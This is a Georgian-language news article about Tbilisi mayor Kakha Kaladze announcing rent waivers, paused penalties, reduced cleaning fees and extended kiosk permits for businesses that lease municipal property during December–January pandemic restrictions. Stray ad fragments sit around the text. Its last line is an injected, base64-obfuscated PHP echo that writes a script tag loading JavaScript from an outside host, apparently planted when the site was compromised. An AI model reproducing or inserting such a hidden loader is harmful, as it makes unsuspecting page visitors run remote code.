celsiusi
ავერსი საქკაბელი
თბილისის მერია მცირე და საშულო ბიზნესს გარკვეულ შეღავათებს სთავაზობს. როგორც მერმა კახა კალაძემ დღეს, 22 დეკემბერს, გამართულ სხდომაზე განაცხადა, შეღავათები შეეხება იმ ბიზნესს, რომლებიც სამეწარმეო საქმიანობას მუნიციპალიტეტისგან ნაქირავებ მიწებზე ახორციელებენ.
 
“შეღავათები შეეხებათ მუნიციპალიტეტის მოიჯარეებს. ესენი არიან ეკონომიკური სუბიექტები, რომლებსაც მერიისგან ან მერიის საკუთრებაში არსებული საწარმოებისგან იჯარით აქვთ აღებული ფართები, სხვადასხვა სახის უძრავი ქონება და მისი მეშვეობით ახორციელებენ სამეწარმეო საქმიანობას. ვინაიდან, პანდემიის გამო შეზღუდვები დაწესებულია დეკემბერ-იანვრის თვეებში, ამ სუბიექტებს იჯარის გადასახადი მოეხსნებათ ამ თვეებში, ასევე ამავე პერიოდში არ დაეკისრებათ სანქცია-საურავები და მანამდე დაკისრებული სანქცია-საურავების დინებაც შეჩერდება,” – აცხადებს კალაძე.
 
თბილისის მერი ასევე განმარტავს, რომ თუ მუნიციპალიტეტის ქონება ქვეიჯარით გაცემული ანუ მერიის მოიჯარეს თავად აქვს გაქირავებული ქონება, შეღავათები ამ კომპანიებზეც გავრცელდება. თბილისის მერია შეღავათებს სთავაზობს მუნიციპალიტეტის მოიჯარე კვების ობიექტებსაც:
 
“მოგეხსენებათ რესტორნები და სხვა კვების ობიექტები ადგილზე გასცემენ ან მიწოდების სერვისს ახორციელებენ. ამ პერიოდში მათთვის დასუფთავების მოსაკრებელი საკონდიტროებისთვის დაწესებული მოსაკრებლის ოდენობის იქნება, რაც 8-ჯერ ნაკლებია. რაც შეეხებათ იმ ობიექტებს, რომლებიც საერთოდ ვერ ფუნქციონირებენ და პანდემიის გამო დახურულები არიან, შეუძლიათ თბილსერვისს ჯგუფს განცხადებით მიმართონ და ამ პერიოდში დასუფთავების მოსაკრებელი მთლიანად მოეხსნებათ. შემდეგი შეღავათი ეხებათ მუნიციპალიტეტის ტერიტორიაზე განთავსებულ ჯიხურებს. თუ ამ ობიექტებს გასული აქვთ საიჯარო ვადა, რაზეც ეკისრებათ ჯარიმა 8 ათასი ლარის ოდენობით და ასევე გასულია არქიტექტურული ნებართვის ვადა, რაც ასევე 8 ათას ლარიან ჯარიმას ითვალისწინებს, მათ ეს ორივე ვადა პირველ ივლისამდე გაუგრძელდებათ. ამის თაობაზე უკვე მივმართეთ ცენტრალურ მთავრობას და დიდი იმედი გაქვს, რომ იქნება მხარდაჭერა. კიდევ ერთხელ ვაზუსტებ რომ ეს შეღავათი ეხებათ იმ სამეწარმეო სუბიეტქებს, რომლებიც საკუთარ საქმიანობას მუნიციპალურ მიწებზე ახორციელებენ,”-აცხადებს კალაძე.
1961
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");